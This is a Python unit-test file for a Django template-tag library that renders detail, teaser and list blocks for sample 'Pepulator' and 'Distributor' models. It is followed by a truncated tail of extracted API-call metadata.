"""Tests that related fields not defined on the model are included."""
pepulator = Distributor.objects.get(name="Mom & Pop")
expected_detail = (u"Mom & Pop:distributor,"
"name,name,Mom & Pop,"
"capacity,capacity,175,"
"stock,stock,[Pepulator #1238,],"
)
detail = model_filters.as_detail_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
class TeaserBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_model_format(self):
"""Tests that a given model is formatted as expected."""
pepulator = Pepulator.objects.get(serial_number=1235)
expected_teaser = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
teaser = model_filters.as_teaser_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_teaser.html')
self.assertEqual(teaser, expected_teaser)
class ListBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'))
def test_list_format(self):
"""Tests that a given model is formatted as expected."""
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = model_filters.as_list_block(pepulator_list)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_empty_queryset(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=5000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_non_query_set_results_in_no_model(self):
"""Test that when a non queryset is used, the model is None"""
# Why? Because we try to read the model off of the queryset. If we just
# have a list of objects, then we don't know the model.
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = [p for p in Pepulator.objects.filter(serial_number__gt=2000)]
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Nones:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_empty_list(self):
"""Test that when a non queryset is used, the model is None"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = []
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Nones:[]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_alternate_title_is_used(self):
"""Test that a list title is used if provided"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block:"Some Pepulators" }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Some Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
class DetailBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_tag_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% detail_block pepulator %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_detail.html')
self.assertEqual(detail, expected_detail)
def test_with_specific_fields(self):
"""Test that the included fields spec is respected"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% with pepulator_factory_pepulator_fields="serial_number, color, height, width" %}'
'{% detail_block pepulator %}'
'{% endwith %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"color,color,red,"
"height,height,12,"
"width,width,15,"
)
detail = template.render(context)
self.assertEqual(detail, expected_detail)
def test_with_excluded_fields(self):
"""Test that the excluded fields spec is respected"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% with pepulator_factory_pepulator_exclude="knuckles, jambs, color, address" %}'
'{% detail_block pepulator %}'
'{% endwith %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"distributed_by,distributed by,Walmart,"
)
detail = template.render(context)
self.assertEqual(detail, expected_detail)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% detail_block pepulator "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% detail_block %}'))
class TeaserBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_tag_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_teaser_template="pepulator_factory/pepulator_teaser.html" %}'
'{% teaser_block pepulator %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_teaser = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
teaser = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_teaser.html')
self.assertEqual(teaser, expected_teaser)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% teaser_block pepulator "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% teaser_block %}'))
class ListBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'))
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_list_template="pepulator_factory/pepulator_list.html" %}'
'{% list_block pepulators %}'
'{% endwith %}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_list.html')
self.assertEqual(rendering, expected_rendering)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% list_block pepulators "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% list_block %}'))
class ModelBlockModuleTest (TestCase):
def test_all_tags_and_filters_loaded(self):
template = Template(('{% load model_blocks %}'
'{% detail_block pepulator %}'
'{% list_block pepulators %}'
'{{ pepulator|as_detail_block }}'
'{{ pepulators|as_list_block }}'))
# We just care that everything loaded, and we were able to get here
# without incidence.
self.assert_(True)
class SideEffectsTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}'))
def test_model_doesnt_carry_over_into_future_blocks(self):
template = Template(('{% load model_tags %}'
'{{ model }}'
'{% list_block distributors %}'
'{{ model }}'))
distributor_list = Distributor.objects.all()
context = Context({'model':'My String',
'distributors':distributor_list})
expected_rendering = (u"My String"
"Distributors"
"My String")
rendering = template.render(context)
self.assertEqual(rendering, expected_rendering)
| [
"example_project.pepulator_factory.models.Distributor.objects.get",
"model_blocks.templatetags.model_nodes.get_template.assert_called_with",
"model_blocks.templatetags.model_filters.as_teaser_block",
"django.template.Template",
"model_blocks.templatetags.model_filters.as_list_block",
"model_blocks.templat... | [((1753, 1794), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (1774, 1794), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((2311, 2351), 'model_blocks.templatetags.model_filters.as_detail_block', 'model_filters.as_detail_block', (['pepulator'], {}), '(pepulator)\n', (2340, 2351), False, 'from model_blocks.templatetags import model_filters\n'), ((2369, 2447), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (2412, 2447), False, 'from model_blocks.templatetags import model_nodes\n'), ((2647, 2714), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulator|as_detail_block }}"""'], {}), "('{% load model_filters %}{{ pepulator|as_detail_block }}')\n", (2655, 2714), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((2778, 2819), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (2799, 2819), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((2838, 2871), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (2845, 2871), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((3429, 3507), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (3472, 3507), False, 'from model_blocks.templatetags import model_nodes\n'), ((3682, 3769), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulator|as_detail_block:"My Pepulator" }}"""'], {}), '(\n \'{% load model_filters %}{{ pepulator|as_detail_block:"My Pepulator" }}\')\n', (3690, 3769), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((3828, 3869), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (3849, 3869), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((3888, 3921), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (3895, 3921), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((4476, 4554), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (4519, 4554), False, 'from model_blocks.templatetags import model_nodes\n'), ((4741, 4782), 'example_project.pepulator_factory.models.Distributor.objects.get', 'Distributor.objects.get', ([], {'name': '"""Mom & Pop"""'}), "(name='Mom & Pop')\n", (4764, 4782), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((4990, 5030), 'model_blocks.templatetags.model_filters.as_detail_block', 'model_filters.as_detail_block', (['pepulator'], {}), '(pepulator)\n', (5019, 5030), False, 'from model_blocks.templatetags import model_filters\n'), ((5048, 5126), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (5091, 5126), False, 'from model_blocks.templatetags import model_nodes\n'), ((5922, 5963), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (5943, 5963), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((6479, 6519), 'model_blocks.templatetags.model_filters.as_teaser_block', 'model_filters.as_teaser_block', (['pepulator'], {}), '(pepulator)\n', (6508, 6519), False, 'from model_blocks.templatetags import model_filters\n'), ((6537, 6615), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_teaser.html"""'], {}), "('model_blocks/object_teaser.html')\n", (6580, 6615), False, 'from model_blocks.templatetags import model_nodes\n'), ((7244, 7292), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (7268, 7292), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((7462, 7505), 'model_blocks.templatetags.model_filters.as_list_block', 'model_filters.as_list_block', (['pepulator_list'], {}), '(pepulator_list)\n', (7489, 7505), False, 'from model_blocks.templatetags import model_filters\n'), ((7523, 7599), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (7566, 7599), False, 'from model_blocks.templatetags import model_nodes\n'), ((7805, 7871), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (7813, 7871), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((7931, 7979), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (7955, 7979), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((7998, 8037), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (8005, 8037), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((8248, 8324), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (8291, 8324), False, 'from model_blocks.templatetags import model_nodes\n'), ((8520, 8586), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (8528, 8586), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((8646, 8694), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(5000)'}), '(serial_number__gt=5000)\n', (8670, 8694), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((8713, 8752), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (8720, 8752), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((8871, 8947), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (8914, 8947), False, 'from model_blocks.templatetags import model_nodes\n'), ((9307, 9373), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (9315, 9373), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((9513, 9552), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (9520, 9552), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((9758, 9834), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (9801, 9834), False, 'from model_blocks.templatetags import model_nodes\n'), ((10027, 10093), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (10035, 10093), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((10174, 10213), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (10181, 10213), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((10327, 10403), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (10370, 10403), False, 'from model_blocks.templatetags import model_nodes\n'), ((10586, 10675), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block:"Some Pepulators" }}"""'], {}), '(\n \'{% load model_filters %}{{ pepulators|as_list_block:"Some Pepulators" }}\')\n', (10594, 10675), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((10730, 10778), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (10754, 10778), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((10797, 10836), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (10804, 10836), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((11052, 11128), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (11095, 11128), False, 'from model_blocks.templatetags import model_nodes\n'), ((11937, 12117), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% detail_block pepulator %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% detail_block pepulator %}{% endwith %}\'\n )\n', (11945, 12117), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((12235, 12276), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (12256, 12276), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((12295, 12328), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (12302, 12328), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((12885, 12976), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""pepulator_factory/pepulator_detail.html"""'], {}), "(\n 'pepulator_factory/pepulator_detail.html')\n", (12928, 12976), False, 'from model_blocks.templatetags import model_nodes\n'), ((13163, 13439), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_fields="serial_number, color, height, width" %}{% detail_block pepulator %}{% endwith %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_fields="serial_number, color, height, width" %}{% detail_block pepulator %}{% endwith %}{% endwith %}\'\n )\n', (13171, 13439), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((13621, 13662), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (13642, 13662), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((13681, 13714), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (13688, 13714), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((14173, 14446), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_exclude="knuckles, jambs, color, address" %}{% detail_block pepulator %}{% endwith %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_exclude="knuckles, jambs, color, address" %}{% detail_block pepulator %}{% endwith %}{% endwith %}\'\n )\n', (14181, 14446), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((14628, 14669), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (14649, 14669), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((14688, 14721), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (14695, 14721), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((16293, 16473), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_teaser_template="pepulator_factory/pepulator_teaser.html" %}{% teaser_block pepulator %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_teaser_template="pepulator_factory/pepulator_teaser.html" %}{% teaser_block pepulator %}{% endwith %}\'\n )\n', (16301, 16473), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((16591, 16632), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (16612, 16632), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((16651, 16684), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (16658, 16684), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((17241, 17332), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""pepulator_factory/pepulator_teaser.html"""'], {}), "(\n 'pepulator_factory/pepulator_teaser.html')\n", (17284, 17332), False, 'from model_blocks.templatetags import model_nodes\n'), ((18368, 18543), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_list_template="pepulator_factory/pepulator_list.html" %}{% list_block pepulators %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_list_template="pepulator_factory/pepulator_list.html" %}{% list_block pepulators %}{% endwith %}\'\n )\n', (18376, 18543), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((18657, 18705), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (18681, 18705), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((18724, 18763), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (18731, 18763), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((18974, 19063), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""pepulator_factory/pepulator_list.html"""'], {}), "(\n 'pepulator_factory/pepulator_list.html')\n", (19017, 19063), False, 'from model_blocks.templatetags import model_nodes\n'), ((19617, 19778), 'django.template.Template', 'Template', (['"""{% load model_blocks %}{% detail_block pepulator %}{% list_block pepulators %}{{ pepulator|as_detail_block }}{{ pepulators|as_list_block }}"""'], {}), "(\n '{% load model_blocks %}{% detail_block pepulator %}{% list_block pepulators %}{{ pepulator|as_detail_block }}{{ pepulators|as_list_block }}'\n )\n", (19625, 19778), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((20562, 20651), 'django.template.Template', 'Template', (['"""{% load model_tags %}{{ model }}{% list_block distributors %}{{ model }}"""'], {}), "(\n '{% load model_tags %}{{ model }}{% list_block distributors %}{{ model }}')\n", (20570, 20651), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((20772, 20797), 'example_project.pepulator_factory.models.Distributor.objects.all', 'Distributor.objects.all', ([], {}), '()\n', (20795, 20797), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((20816, 20881), 'django.template.Context', 'Context', (["{'model': 'My String', 'distributors': distributor_list}"], {}), "({'model': 'My String', 'distributors': distributor_list})\n", (20823, 20881), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((753, 1099), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list, is_link in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{% if is_link %}@{{ value }}{% else %}{{ value|safe }}{% endif %}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list, is_link in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{% if is_link %}@{{ value }}{% else %}{{ value|safe }}{% endif %}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (761, 1099), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((5514, 5802), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (5522, 5802), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((7001, 7120), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}"""'], {}), "(\n '{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'\n )\n", (7009, 7120), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((9445, 9493), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (9469, 9493), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((11511, 11799), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (11519, 11799), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((15867, 16155), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe 